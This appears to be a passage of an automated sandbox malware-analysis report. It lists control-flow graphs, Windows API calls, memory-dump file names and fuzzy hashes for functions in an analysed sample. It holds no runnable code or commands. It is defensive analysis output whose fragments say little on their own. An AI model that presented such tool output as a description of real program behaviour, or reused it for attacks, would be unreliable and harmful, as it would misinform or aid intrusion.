control_flow_graph 342 407749-40774a 343 4076dc-4076e6 WriteFile 342->343 344 40774c-40776f 342->344 346 4076e8-4076ea call 40748c 343->346 347 4076ef-4076f2 343->347 345 407770-407785 344->345 350 407787 345->350 351 4077f9 345->351 346->347 348 407700-407704 347->348 349 4076f4-4076fb call 4073ec 347->349 349->348 354 40778a-40778f 350->354 355 4077fd-407802 350->355 356 40783b-40783d 351->356 357 4077fb 351->357 360 407803-407819 354->360 362 407791-407792 354->362 355->360 358 407841-407843 356->358 357->355 361 40785b-40785c 358->361 360->361 372 40781b 360->372 363 4078d6-4078eb call 407890 InterlockedExchange 361->363 364 40785e-40788c 361->364 365 407724-407741 362->365 366 407794-4077b4 362->366 387 407912-407917 363->387 388 4078ed-407910 363->388 381 407820-407823 364->381 382 407890-407893 364->382 368 407743 365->368 369 4077b5 365->369 366->369 373 407746-407747 368->373 374 4077b9 368->374 377 4077b6-4077b7 369->377 378 4077f7-4077f8 369->378 379 40781e-40781f 372->379 373->342 380 4077bb-4077cd 373->380 374->380 377->374 378->351 379->381 380->358 384 4077cf-4077d4 380->384 385 407824 381->385 386 407898 381->386 382->386 384->356 392 4077d6-4077de 384->392 390 407825 385->390 391 40789a 385->391 386->391 388->387 388->388 393 407896-407897 390->393 394 407826-40782d 390->394 395 40789f 391->395 392->345 404 4077e0 392->404 393->386 397 4078a1 394->397 398 40782f 394->398 395->397 400 4078a3 397->400 401 4078ac 397->401 402 407832-407833 398->402 403 4078a5-4078aa 398->403 400->403 405 4078ae-4078af 401->405 402->356 402->379 403->405 404->378 405->395 406 4078b1-4078bd 405->406 406->386 407 4078bf-4078c0 406->407
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
• Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
• Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
• Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed)
control_flow_graph 408 401fd4-401fe6 409 401fe8 call 401918 408->409 410 401ffb-402010 408->410 416 401fed-401fef 409->416 412 402012-402017 RtlEnterCriticalSection 410->412 413 40201c-402025 410->413 412->413 414 402027 413->414 415 40202c-402032 413->415 414->415 417 402038-40203c 415->417 418 4020cb-4020d1 415->418 416->410 419 401ff1-401ff6 416->419 422 402041-402050 417->422 423 40203e 417->423 420 4020d3-4020e0 418->420 421 40211d-40211f call 401ee0 418->421 424 40214f-402158 419->424 425 4020e2-4020ea 420->425 426 4020ef-40211b call 402f54 420->426 432 402124-40213b 421->432 422->418 427 402052-402060 422->427 423->422 425->426 426->424 430 402062-402066 427->430 431 40207c-402080 427->431 434 402068 430->434 435 40206b-40207a 430->435 437 402082 431->437 438 402085-4020a0 431->438 439 402147 432->439 440 40213d-402142 RtlLeaveCriticalSection 432->440 434->435 441 4020a2-4020c6 call 402f54 435->441 437->438 438->441 440->439 441->424
APIs
• RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
  • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
  • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
  • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
  • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
• String ID:
• API String ID: 296031713-0
• Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
• Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
• Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
• Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed)
control_flow_graph 444 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
APIs
• SetErrorMode.KERNEL32(00008000), ref: 00406FAA
• LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ErrorLibraryLoadMode
• String ID:
• API String ID: 2987862817-0
• Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
• Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
• Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
• Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
• GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020F03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
• Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
• Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
• Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 448 40762c-40764a ReadFile 449 407663-40766a 448->449 450 40764c-407650 448->450 451 407652-40765a GetLastError 450->451 452 40765c-40765e call 40748c 450->452 451->449 451->452 452->449
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1948546556-0
                                                                                                                                                                                                                                  • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                                                                                                                                                  • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                                                                                                                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020F03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1156039329-0
                                                                                                                                                                                                                                  • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                                                                                                                                                  • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2087232378-0
                                                                                                                                                                                                                                  • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                                                                                                                                                  • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                                                                                                                                                                                    • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
                                                                                                                                                                                                                                    • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1658689577-0
                                                                                                                                                                                                                                  • Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                                                                                                                                                                  • Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                  • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                                                                                                                                                  • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
• Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
• Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
• Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
• Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
• Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
• Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
• Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
• Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
Uniqueness

Uniqueness Score: -1.00%

APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020F03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID:
• API String ID: 442123175-0
• Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
• Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
• Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
• Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
Uniqueness

Uniqueness Score: -1.00%

APIs
• FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: FormatMessage
• String ID:
• API String ID: 1306739567-0
• Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
• Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
• Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
• Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetEndOfFile.KERNEL32(?,02108000,0040AA59,00000000), ref: 004076B3
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020F03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ErrorFileLast
• String ID:
• API String ID: 734332943-0
• Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
• Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
• Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
• Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
• Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
• Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
• Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                  • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                                                                                                                                                  • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CharPrev
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 122130370-0
